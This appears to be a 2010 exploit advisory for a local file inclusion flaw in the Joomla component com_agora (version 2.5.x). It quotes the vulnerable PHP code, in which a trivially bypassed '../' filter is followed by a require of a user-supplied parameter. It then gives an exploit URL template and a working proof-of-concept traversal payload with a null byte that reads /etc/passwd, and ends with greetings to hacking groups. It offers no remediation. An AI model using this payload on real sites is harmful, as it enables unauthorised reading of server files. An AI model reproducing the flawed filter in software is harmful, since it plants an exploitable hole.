================================================================================================

 Title    : Joomla Component Agora (com_agora) LFI Vulnerability
 Vendor   : http://jvital.com
 Download : http://jvitals.com/downloads/file/101-agora-pantheon
 Version  : 2.5.x Pantheon
 Date     : Sunday, July 4 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te
 Contact  : wishnusakti[at]gmail.com

 ================================================================================================

 [+] Vulnerable

     	$task = trim( JRequest::getVar('task', "") );
	$task = str_replace( '../', '', $task );
	if ($task)
	{
    		require (AGORA_ROOT . "$task.php");
	}
		else
	{
		require ($agora_path . "/index.php");
	}

 [+] Exploit

     http://[site]/[path]/index.php?option=com_agora&task=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_agora&task=....//....//....//....//....//....//....//....//..../etc/passwd%0000

 ================================================================================================

Very Special thanks :

Penghuni priv8 Server

(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, s4va, cheche angela zhang, madonk, & Bot² Scan :D)


en Semua Komunitas Hacking Tanah Air

Peace Yo :)


to all my friends :

cakill, aurell, hafiz, xco, xshadow, 

gblack, krembis, biakkobar, hendri_note

 ================================================================================================

# ./wishnusakti + inc0mp13te